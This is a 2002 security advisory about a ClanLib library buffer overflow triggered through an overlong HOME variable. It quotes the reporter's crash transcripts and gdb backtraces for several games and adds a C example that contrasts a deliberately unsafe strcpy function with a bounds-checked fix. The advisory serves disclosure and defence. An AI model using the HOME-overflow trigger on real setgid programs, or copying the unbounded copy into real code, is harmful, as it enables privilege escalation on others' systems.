SecurityTracker.com
SecurityTracker Archives

Category:  Application (Game) > ClanLib Game SDK
Vendor:  Clanlib.org
ClanLib Game Software Development Kit Library Used By Many Game Applications Has Buffer Overflow That May Allow Local Users to Obtain Elevated or Root Privileges on the Host
SecurityTracker Alert ID:  1003244
SecurityTracker URL:  http://securitytracker.com/id/1003244
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jan 16 2002
Impact:   Execution of arbitrary code via local system, Root access via local system, User access via local system


Description:   A buffer overflow vulnerability was reported in a library included in the ClanLib game software development kit. A remote user can execute arbitrary code on the system. Some games that have set user id (suid) root privileges can be exploited by local users to yield root access.

A local user can set the HOME environment variable to a long string and then invoke a game that uses ClanLib to execute arbitrary code on the host. For example, the Super Methane Brothers game, which is apparently configured with set group id (sgid) 'games' group privileges, lets a local user execute code with 'games' group privileges and obtain elevated privileges on the host.

A demonstration exploit transcript is provided:

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3)
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

The author of the report has provided demonstration exploit transcripts for a few other vulnerable games that use ClanLib (see the Source Message).

Impact:   A local user can execute arbitrary code on the host to obtain elevated privileges. The privileges obtained depend on the game application that uses ClanLib.
Solution:   No solution was available at the time of this entry.
Vendor URL:  clanlib.org/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


Source Message Contents

Subject:  Clanlib overflow / Super Methane Brothers overflow


Charles stayed up all night and found a hole in Eterm so I felt obligated to stay up all night and find something else wrong on my box too. In doing so I found an overflow in a game included with Mandrake 8.1 called Super Methane Brothers. $HOME=<bof here> then run /usr/games/methane. In turn that caused me to find an overflow in ClanLib. So thanks for staying up late last night core!

This was all tested against some rpms made from the mandrake src with "rpm --rebuild":
libclanlib0-0.4.4-28mdk
libclanlib0-magick-0.4.4-28mdk
clanlib-0.4.4-28mdk
libclanlib0-gl-0.4.4-28mdk
libclanlib0-png-0.4.4-28mdk
libclanlib0-devel-0.4.4-28mdk
libclanlib1-0.5.1-4mdk
libclanlib0-mikmod-0.4.4-28mdk

It looks like the buffer overflow in /usr/games/methane is a library overflow in clanlib instead. I checked some other clanlib based games to prove this.

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) 
http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

[root@linuxppc root]# ls -al /usr/games/methane
-rwxr-sr-x    1 root     games     1978056 Nov 13 06:36 /usr/games/methane*

This was default on my intel Mandrake 8.1 box. I overwrote edx and ecx with my own data. I don't do intel so I didn't try any further. I got the packages for ppc and it was no fun to play with so I decided to look at some other clanlib based games to at least verify the library issue. I think the below link has info on the function causing the problem.

http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325

Here are some more examples of the clanlib overflow.

StarWar-0.0.1d.tar.gz
[root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc StarWar-0.0.1]# src/starwar
Segmentation fault (core dumped)

This is the same place methane cored on my intel box...
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
(gdb) bt
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
#1  0x0ff89554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
#2  0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0ff83b28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
#4  0x1000d37c in InitDisplayApp::main ()
#5  0x0ff85270 in main () from /usr/lib/libclanCore.so.0
#6  0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6

kwirk-0.0.16.tar.gz
[root@linuxppc Kwirk]# ./kwirk
Segmentation fault (core dumped)
(gdb)
#0  0x0fd36b78 in strcpy () from /lib/libc.so.6
#1  0x0fef0554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
#2  0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3  0x0feeab28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
#4  0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24
#5  0x0feec1fc in main () from /usr/lib/libclanCore.so.0
#6  0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6

clankanoid-0.1.tgz
[root@linuxppc clanka]# ./clankanoid
Segmentation fault (core dumped)

I think you get the idea.
I would imagine about any game on http://www.clanlib.org/links.html would have this issue also. I'm sure a few clanlib games are suid like the one that came with Mandrake 8.1 (methane).
-KF
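The backtraces in the message above end in strcpy() called from FileConfig::LocalConfigFile, which is consistent with the advisory's description: the value of $HOME is copied into a fixed-size buffer without a length check, so a 9000-byte HOME writes past the end of it. The following is an added illustration written for this page, not ClanLib's code; the buffer size (256), the config file name and the function names are assumptions. It places the unchecked pattern beside a length-checked replacement that fails closed when the input does not fit:

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of the fixed buffer in this illustration. The real ClanLib buffer
 * size is not given in the advisory; 256 is an assumption. */
#define CONFIG_PATH_MAX 256

/* Hypothetical config file name appended to $HOME (an assumption). */
static const char CONFIG_SUFFIX[] = "/.clanlib/config";

/* The pattern the backtrace points at: $HOME copied into a fixed buffer
 * with no bound. With a short HOME it works, which is why the defect goes
 * unnoticed; with a HOME longer than the buffer it overflows. Kept only
 * for comparison; never pass untrusted input to it. */
static void build_config_path_unsafe(const char *home, char *out)
{
    strcpy(out, home);            /* no bound: overflow if home is too long */
    strcat(out, CONFIG_SUFFIX);   /* same problem for the suffix           */
}

/* Hardened form: measure first, reject anything that does not fit
 * together with the suffix and the terminating NUL, then copy. */
static bool build_config_path_safe(const char *home, char *out, size_t outlen)
{
    if (home == NULL || out == NULL || outlen == 0)
        return false;

    /* strnlen never reads past outlen bytes of home */
    size_t home_len = strnlen(home, outlen);

    /* home_len == outlen means no NUL was found within the buffer size;
     * sizeof(CONFIG_SUFFIX) already counts the NUL terminator. */
    if (home_len >= outlen || home_len + sizeof(CONFIG_SUFFIX) > outlen)
        return false;

    memcpy(out, home, home_len);
    memcpy(out + home_len, CONFIG_SUFFIX, sizeof(CONFIG_SUFFIX));
    return true;
}

/* Wrapper that reads HOME from the environment, as the library did. */
static bool local_config_path(char *out, size_t outlen)
{
    return build_config_path_safe(getenv("HOME"), out, outlen);
}

int main(void)
{
    char path[CONFIG_PATH_MAX];

    /* Constructed inputs: a normal home directory and a 9000-byte one
     * like the one used in the advisory's transcript. */
    const char *normal = "/home/alice";
    char huge[9001];
    memset(huge, 'A', 9000);
    huge[9000] = '\0';

    build_config_path_unsafe(normal, path);   /* fine only because input is short */
    printf("unsafe, short input: %s\n", path);

    if (build_config_path_safe(normal, path, sizeof path))
        printf("safe, short input:   %s\n", path);

    if (!build_config_path_safe(huge, path, sizeof path))
        printf("safe, %zu-byte HOME: rejected (buffer is %d bytes)\n",
               strlen(huge), CONFIG_PATH_MAX);

    if (local_config_path(path, sizeof path))
        printf("from environment:    %s\n", path);
    else
        printf("from environment:    HOME unset or too long, rejected\n");
    return 0;
}
```

Two points the comparison is meant to make. First, the check must account for everything that will be written (the suffix and the NUL), not just the copied string; an off-by-one here is the same class of bug. Second, for a program that runs with set-user-id or set-group-id privileges, as the methane binary listing above shows, environment variables such as HOME are attacker-controlled input and should be treated like any other untrusted data; a bounded copy removes the overflow, and deriving the home directory from the password database rather than the environment removes the reliance on the variable altogether.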


Copyright 2019, SecurityGlobal.net LLC